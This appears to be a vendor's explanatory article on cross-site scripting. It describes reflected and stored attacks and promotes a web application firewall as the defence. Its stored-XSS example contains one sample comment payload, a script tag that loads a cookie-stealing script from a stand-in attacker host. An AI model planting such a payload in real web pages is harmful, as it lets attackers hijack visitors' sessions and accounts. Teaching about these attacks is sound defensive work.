Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is used by attackers to inject malicious code into vulnerable web applications. Unlike other web application attacks (such as SQL injection) attackers are not directly targeting the application. Instead, the application is a means for attacking the application user.
Although there are myriad reasons for an XSS attack, the more common ones are:
- Hijacking the user’s account
- Accessing the user’s browser history or private messages
- Exploiting the user’s web applications and devices, such as webcams, microphones, files, geolocation info, etc.
- Distributing web worms via the user’s browser
Often an XSS attack is the first step in an escalating series of more serious attacks. When combined with social engineering, an XSS attack can result in identity theft, keylogging, cookie theft, or phishing attacks.
An XSS attack embeds a malicious script into a vulnerable webpage, which is then executed by the user’s browser. A webpage is vulnerable if:
- User-supplied input is automatically added to HTML output; and
- Output to the browser does not use sensitive-escaping to prevent running user-supplied scripts
There are two primary types of XSS attacks: reflective and persistent.
Reflective (Unstored) XSS Attacks
A reflective XSS attack mimic a trusted person or organization so that a user clicks a link to a malicious script.
Persistent (Stored) XXS Attacks
A persistent XSS attack embeds malicious HTML tags — for example, script, body, img, iframe, input, link, object, table — directly into a vulnerable web application’s page. Blogs, social networks, video sharing platforms, and message boards are primary targets for persistent XSS attacks.
Unlike a reflective XSS attack, which activates an attack script only after a user clicks a malicious link, a persistent XSS attack only requires a visit to the compromised web page. This increases the reach of the attack, endangering all visitors regardless of their level of vigilance.
For example, an attacker discovers that an online news site allows HTML tags to be embedded in a page’s comment section. The attacker submits a comment that includes HTML tags, such as:
Great article! Read my review here <script src=http://attacksite.com/stealer.js></script>
With the session cookies in hand, the attacker can hijack any visitor’s account, accessing personal and confidential information without the knowledge or consent of the visitor.
Figure 1. Persistent XSS Attack
A web application firewall (WAF) is the most commonly used solution for protecting against XSS and other web application attacks. In the case of XSS attacks, most WAFs use signature-based filtering to identify and block malicious requests.
Learn how Imperva solutions can help you mitigate XSS attacks.